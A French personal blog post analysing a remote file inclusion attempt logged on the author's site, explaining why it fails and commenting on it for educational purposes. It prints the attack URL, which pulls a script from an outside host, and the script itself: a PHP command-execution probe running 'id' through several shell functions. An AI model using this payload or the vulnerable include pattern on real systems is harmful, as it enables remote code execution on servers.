Aller au contenu | Aller au menu | Page d'accueil

Mon blog

spring | summer | autumn | default

Mes billets

Catégorie courante : Mes billets / Accueil

Dernière tentative de piratage en date

Une tentative de piratage très classique, hyper fréquente et qui arrive même sur mon site qui a pourtant un faible nombre de visiteurs.

La tentative consiste tout simplement à essayer d'inclure un fichier PHP distant en détournant les fonctions du portail. Concrètement, cela donne :
/www/data/files/index.php?page=http://www.techbidders.com/upload/id.txt?

Évidemment, cette astuce ne fonctionne déjà que si la configuration de PHP le permet (ce qui n'est pas le cas chez mon hébergeur). Ensuite, cela suppose que dans mon code source j'ai fait un bête : include($_GET['page']); ce qui n'est évidemment pas le cas.

Voici le script qui est tenté d'être inclus, que je reprends ici (mis en forme) à titre informatif et éducatif, mais qui de toute manière présente assez peu d'intérêt pour un éventuel pirate (au passage, l'adresse IP du coupable était 220.80.108.33 le 25/12/2008 à 07:58:21 GMT +01:00) :

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe) {
	$res = '';
	if (!empty($cfe)) {
		if(function_exists('exec')) {
			@exec($cfe,$res);
			$res = join("\n",$res);
		}
		elseif(function_exists('shell_exec')) {
			$res = @shell_exec($cfe);
		}
		elseif(function_exists('system')) {
			@ob_start();
			@system($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		}
		elseif(function_exists('passthru')) {
			@ob_start();
			@passthru($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		}
		elseif(@is_resource($f = @popen($cfe,"r"))) {
			$res = "";
			while(!@feof($f)) {
				$res .= @fread($f,1024);
			}
			@pclose($f);
		}
	}
	return $res;
}
exit;
Ecrit par Olivier BICHLER Contacter l'auteur Aller sur le site Web de l'auteur, le 26/12/2008 18:03:40

Ce billet au format PDF.
Imprimer ce billet.
Recommander ce billet à un(e) ami(e).

Commentaires :

Aucun commentaire trouvé.

Ajouter un commentaire.

Exclusion des robots ne suivant pas les directives du fichier « robots.txt ». NE PAS SUIVRE CE LIEN.